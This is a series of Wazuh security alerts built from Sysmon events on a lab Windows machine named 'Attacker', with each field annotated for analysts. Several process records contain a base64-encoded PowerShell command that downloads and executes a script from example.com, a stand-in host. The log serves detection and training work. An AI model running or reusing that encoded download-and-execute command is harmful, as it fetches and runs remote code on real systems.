data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 101 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534398.1943735 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:56.6620358Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285566 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:56.644
ProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00}
ProcessId: 12340
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_pk3v0v2m.0ww.ps1
CreationUtcTime: 2025-04-24 22:39:56.644
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:56.644 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdbb-680a-b90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 12340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_pk3v0v2m.0ww.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:56.644 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 98 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534401.1946504 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:58.8999675Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285635 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:39:57.681
ProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00}
ProcessId: 10672
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00}
ParentProcessId: 12340
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:57.681 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdbb-680a-b90b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 12340 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 102 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534401.1954575 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:39:59.2948251Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285636 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:39:59.125
ProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00}
ProcessId: 10672
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_1bx1rwm3.pc4.ps1
CreationUtcTime: 2025-04-24 22:39:59.125
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:39:59.125 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 10672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_1bx1rwm3.pc4.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:39:59.125 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 99 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534404.1957344 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:02.0874693Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285678 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:40:00.599
ProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00}
ProcessId: 16112
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00}
ParentProcessId: 10672
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:40:00.599 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bdc0-680a-bd0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 16112 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bdbd-680a-bb0b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 10672 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 103 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534405.1965415 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:40:02.5743551Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 285679 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:40:02.553
ProcessGuid: {94294ddc-bdc0-680a-bd0b-000000000e00}
ProcessId: 16112
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_n3jscojm.st0.ps1
CreationUtcTime: 2025-04-24 22:40:02.553
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
